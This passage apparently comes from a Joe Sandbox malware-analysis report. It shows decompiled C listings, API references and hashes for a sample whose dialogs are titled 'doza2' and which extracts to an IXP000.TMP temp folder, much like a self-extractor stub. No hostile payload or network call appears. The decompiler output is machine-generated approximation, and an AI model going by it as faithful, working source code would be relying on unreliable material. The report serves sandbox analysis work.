				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x408004; // 0x7980a54a
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x40a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00406CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x004017f6
0x004017fd
0x00401805
0x0040180b
0x0040180d
0x00401815
0x00401818
0x00401820
0x00401824
0x0040182c
0x00401832
0x00401837
0x00401851
0x00401854
0x0040185d
0x00401862
0x0040186c
0x00401872
0x00401877
0x0040187e
0x0040187e
0x00401883
0x00401883
0x0040185d
0x0040188a
0x0040188a
0x004018a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership,?,?,?,004018DD), ref: 0040182C
AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A

Strings

CheckTokenMembership, xrefs: 00401826
advapi32.dll, xrefs: 00401810

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
Instruction ID: 1bd3692ccccaa6d7600f9d0fef09d9c741b671f303ea2036aeae9e10c16a3b59
Opcode Fuzzy Hash: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
Instruction Fuzzy Hash: 35119631E00309ABDB14AFA4DD49ABFBB78EF48704F10417AFA01F2390DA748D148B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x406e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00406cf7
0x00406cfd
0x00406d00
0x00406d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406E26,00401000), ref: 00406CF7
UnhandledExceptionFilter.KERNEL32(&n@,?,00406E26,00401000), ref: 00406D00
GetCurrentProcess.KERNEL32(C0000409,?,00406E26,00401000), ref: 00406D0B
TerminateProcess.KERNEL32(00000000,?,00406E26,00401000), ref: 00406D12

Strings

&n@, xrefs: 00406CFD

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n@
API String ID: 3231755760-1310975225
Opcode ID: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
Instruction ID: 8cb3f13b78dd38f3b5ff2bea80fcfbd25beb2721d0077c0a29712bb6dc75ce69
Opcode Fuzzy Hash: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
Instruction Fuzzy Hash: 87D0C932000308BBDB002BE1EE0CE593F28EB48212F444020F719AA020CA3244618B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00407155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x408004; // 0x7980a54a
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x408004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x408004 = _t39;
				}
				_t37 =  !_t36;
				 *0x408008 = _t37;
				return _t37;
			}

0x0040715d
0x00407161
0x00407165
0x00407178
0x00407182
0x0040718e
0x00407197
0x004071a0
0x004071b1
0x004071b8
0x004071c4
0x004071c7
0x004071cb
0x004071d5
0x004071da
0x004071da
0x004071dc
0x004071dc
0x004071e2
0x004071e5
0x004071ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
GetCurrentProcessId.KERNEL32 ref: 00407191
GetCurrentThreadId.KERNEL32 ref: 0040719A
GetTickCount.KERNEL32 ref: 004071A3
QueryPerformanceCounter.KERNEL32(?), ref: 004071B8

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
Instruction ID: bfdbf58dd1f09331b2ef62520d31486fb2a653da5464fc683e2cb64336e098ce
Opcode Fuzzy Hash: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
Instruction Fuzzy Hash: CF112871D012089BCB10DBB8DB48A9EB7F4EB08314F65486AD801EB250EA349E148B49

Uniqueness

Uniqueness Score: -1.00%

Function 00406F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F40() {

				SetUnhandledExceptionFilter(E00406EF0);
				return 0;
			}

0x00406f45
0x00406f4d

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006EF0), ref: 00406F45

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
Instruction ID: 378a529128b3a7e3d1065d46846c981e64e6a00043b7090dbb000319764bf95a
Opcode Fuzzy Hash: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
Instruction Fuzzy Hash: DD90027425130047D6101B70DE1991975A15B4D602B925475A012E84D5DB744060659A

Uniqueness

Uniqueness Score: -1.00%

Function 067B00A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.392209330.00000000067B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67b0000_d3HccaLUT7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 5dd06e9ec6a0bbd645a14e6f076faf1493cf218690a3e20bb8f701ad25bbe4dc
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 19118E72340104AFD794DF55DCC0FE773EAEB89220B298065ED08CB312E676E842C760

Uniqueness

Uniqueness Score: -1.00%

Function 00403210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00403210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E004043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x409a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x4091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E004044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x4091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x4091e5 - 3;
						if(_t49 - 0x4091e5 < 3) {
							goto L32;
						}
						_t24 =  *0x4091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x4091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0040658A(0x4091e4, 0x104, 0x401140);
								_t27 = E004058C8(0x4091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x4091e4 - 0x5c;
									if( *0x4091e4 != 0x5c) {
										L30:
										_t30 = E0040597D(0x4091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x4091e5 - 0x5c;
									if( *0x4091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E004044B9(_t64, 0x54a, 0x4091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x4091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x4091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x4091e4 - 0x5c;
						if( *0x4091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x409124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x409a3c, 0x3e8, 0x408598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00404224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x4087a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E004044B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0040321b
0x0040321e
0x00403221
0x0040343c
0x0040343e
0x0040343f
0x00403445
0x00403447
0x00000000
0x00403447
0x00403229
0x0040322a
0x0040322f
0x004033ec
0x004033f7
0x00403410
0x00403416
0x0040341d
0x0040342d
0x0040342d
0x00403438
0x00000000
0x00403438
0x00403237
0x00403243
0x00403243
0x00403246
0x004032ee
0x004032f4
0x004032f6
0x004033d4
0x004033d6
0x004033db
0x004033dc
0x004033de
0x004033df
0x00403370
0x00403372
0x00000000
0x00403372
0x004032fc
0x00403301
0x00403301
0x00403303
0x00403304
0x00403304
0x0040330a
0x0040330d
0x00000000
0x00000000
0x00403313
0x00403318
0x0040331a
0x00403331
0x00403332
0x0040333a
0x0040333d
0x0040337c
0x00403388
0x0040338f
0x00403394
0x00403396
0x004033a4
0x004033ab
0x004033b6
0x004033be
0x004033c3
0x004033c5
0x00403435
0x00403437
0x00403437
0x00000000
0x00403437
0x004033c7
0x004033c9
0x004033cc
0x00000000
0x004033cc
0x004033ad
0x004033b4
0x00000000
0x00000000
0x00000000
0x004033b4
0x00403398
0x00403399
0x0040339b
0x0040339c
0x0040339d
0x00000000
0x0040339d
0x0040334c
0x00403351
0x00403354
0x00000000
0x00000000
0x0040335c
0x00403362
0x00403364
0x00000000
0x00000000
0x00403366
0x00403367
0x00403369
0x0040336a
0x0040336b
0x00000000
0x0040336b
0x0040331c
0x00403323
0x00000000
0x00000000
0x00403329
0x0040332b
0x00000000
0x00000000
0x00000000
0x0040332b
0x0040324c
0x0040324c
0x0040324f
0x004032c8
0x004032ce
0x00000000
0x004032ce
0x00403251
0x00403256
0x00000000
0x00000000
0x00403271
0x00403277
0x00403279
0x00403298
0x0040329d
0x0040329f
0x00000000
0x00000000
0x004032b0
0x004032b6
0x004032b8
0x00000000
0x00000000
0x004032be
0x00403280
0x00403289
0x0040328e
0x00000000
0x0040328e
0x0040327b
0x00000000
0x0040327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00408598,00000200), ref: 00403271
GetDesktopWindow.USER32 ref: 004033E2
SetWindowTextA.USER32(?,doza2), ref: 004033F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00403410
GetDlgItem.USER32(?,00000836), ref: 00403426
EnableWindow.USER32(00000000), ref: 0040342D
EndDialog.USER32(?,00000000), ref: 0040343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004032E2, 004032E7, 00403331, 00403344, 0040335B, 0040336A
doza2, xrefs: 004033F1

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$doza2
API String ID: 2418873061-451215921
Opcode ID: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
Instruction ID: 04d5c2a8db134baef30f0d0166c5a423a0fa44611ce3e06c27fd7db4b1552688
Opcode Fuzzy Hash: ec0898f5d764152806d941a8be05ff3854ee7734cea54d763d8cbd8109858449
Instruction Fuzzy Hash: 7551E47034024176E7215F365D8CF7B2D5D9B86B56F10403AFA45BA2D1CABC8E02926E

Uniqueness

Uniqueness Score: -1.00%

Function 00402CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x408004; // 0x7980a54a
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x409a3c = __ecx;
				memset(0x409140, 0, 0x8fc);
				memset(0x408a20, 0, 0x32c);
				memset(0x4088c0, 0, 0x104);
				 *0x4093ec = 1;
				_t20 = E0040468F("TITLE", 0x409154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x40858c = _t27;
					SetEvent(_t27);
					_t64 = 0x409a34;
					if(E0040468F("EXTRACTOPT", 0x409a34, 4) != 0) {
						if(( *0x409a34 & 0x000000c0) == 0) {
							L12:
							 *0x409120 =  *0x409120 & _t65;
							if(E00405C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x408a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x408184 != 0) {
										__imp__#17();
									}
									if( *0x408a24 == 0) {
										_t57 = _t65;
										if(E004036EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x409a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x409a34 & 0x00000100) == 0 || ( *0x408a38 & 0x00000001) != 0 || E004018A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00406517(_t57, 0x7d6, _t34, E004019E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00402390(0x408a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E004044B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0040468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x408588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x409a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E004044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E004044B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x408588);
										 *0x409124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x409124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00406CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00402cb5
0x00402cbc
0x00402cc7
0x00402cc9
0x00402cd1
0x00402cd3
0x00402cd9
0x00402ce9
0x00402cf9
0x00402d0e
0x00402d15
0x00402d1c
0x00402ef3
0x00000000
0x00402d2d
0x00402d34
0x00402d3b
0x00402d40
0x00402d48
0x00402d59
0x00402d84
0x00402e1f
0x00402e1f
0x00402e2e
0x00402e41
0x00402e5a
0x00402e62
0x00402e6c
0x00402e6c
0x00402e75
0x00402e77
0x00402e77
0x00402e84
0x00402e8b
0x00402e94
0x00000000
0x00402e96
0x00402e96
0x00402e9e
0x00402ea2
0x00402eba
0x00000000
0x00402ece
0x00402ede
0x00402eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00402eed
0x00402eef
0x00402eef
0x00402eef
0x00402eef
0x00402ea2
0x00402e86
0x00402e88
0x00402e88
0x00402e43
0x00402e48
0x00000000
0x00402e48
0x00402e30
0x00402e30
0x00402ef8
0x00402f01
0x00000000
0x00402f01
0x00402d8a
0x00402d8f
0x00402da1
0x00000000
0x00402da3
0x00402dae
0x00402db4
0x00402dbb
0x00000000
0x00402dca
0x00402dd3
0x00402df5
0x00402e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00402dd5
0x00402dde
0x00402de3
0x00402e04
0x00402e0a
0x00402e10
0x00000000
0x00402e10
0x00402dd3
0x00402dbb
0x00402da1
0x00402d5b
0x00402d5b
0x00402d5d
0x00402d69
0x00402d6e
0x00402f06
0x00402f06
0x00402f06
0x00402d59
0x00402f18

APIs

memset.MSVCRT ref: 00402CD9
memset.MSVCRT ref: 00402CE9
memset.MSVCRT ref: 00402CF9

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00402DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E0A

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

VERCHECK, xrefs: 00402E54
EXTRACTOPT, xrefs: 00402D4D
INSTANCECHECK, xrefs: 00402D95
doza2, xrefs: 00402D04, 00402DD9, 00402DF0
TITLE, xrefs: 00402D09

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
Instruction ID: e444e2bf9980804398d7675b07319dafb34b849b4f2297f1b5b9eb94544be107
Opcode Fuzzy Hash: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
Instruction Fuzzy Hash: 2D51C470340301ABE764AB25DF4EB7B2698DB85744F10403FBA81F56E1DAFC8C519A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x4091d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x408584 = _t35;
					E004043D0(_t35, GetDesktopWindow());
					__eflags =  *0x408184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00404FE0, 0, 0, 0x408798);
					 *0x40879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E004044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x40858c);
					_t38 =  *0x408584; // 0x0
					_t25 = E004044B9(_t38, 0x4b2, 0x401140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x4091d8 = 1;
						SetEvent( *0x40858c);
						_t39 =  *0x40879c; // 0x0
						E00403680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x40858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x40879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x004034fb
0x004034fe
0x00403665
0x00403666
0x00403666
0x00403668
0x0040366e
0x0040366e
0x00403671
0x00403671
0x00403677
0x00000000
0x00403677
0x00403504
0x00403506
0x00403507
0x0040350c
0x0040365b
0x0040365f
0x00000000
0x00000000
0x00000000
0x00403661
0x00403512
0x00403515
0x004035be
0x004035c1
0x004035d1
0x004035d8
0x004035de
0x004035f8
0x00403617
0x00403617
0x00403623
0x00403637
0x0040363d
0x00403642
0x00403644
0x00000000
0x00403646
0x00403652
0x00403657
0x00403658
0x00000000
0x00403658
0x00403644
0x0040351b
0x0040351d
0x0040354f
0x00403553
0x00000000
0x00000000
0x0040355f
0x00403565
0x0040357c
0x00403581
0x00403584
0x0040359b
0x004035a1
0x004035a7
0x004035ad
0x004035b3
0x004035b8
0x00000000
0x004035b8
0x00403586
0x00403588
0x00000000
0x00000000
0x00403590
0x00000000
0x00403590
0x00403524
0x00403535
0x00403541
0x00000000
0x00403549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00403535
EndDialog.USER32(?,?), ref: 00403541
ResetEvent.KERNEL32 ref: 0040355F
SetEvent.KERNEL32(00401140,00000000,00000020,00000004), ref: 00403590
GetDesktopWindow.USER32 ref: 004035C7
GetDlgItem.USER32(?,0000083B), ref: 004035F1
SendMessageA.USER32(00000000), ref: 004035F8
GetDlgItem.USER32(?,0000083B), ref: 00403610
SendMessageA.USER32(00000000), ref: 00403617
SetWindowTextA.USER32(?,doza2), ref: 00403623
CreateThread.KERNEL32 ref: 00403637
EndDialog.USER32(?,00000000), ref: 00403671

Strings

doza2, xrefs: 0040361D

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
Instruction ID: fe1ba82ed1f1710f0b6574d98c0674f12e8c992116b8aaefa4380529af25bc15
Opcode Fuzzy Hash: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
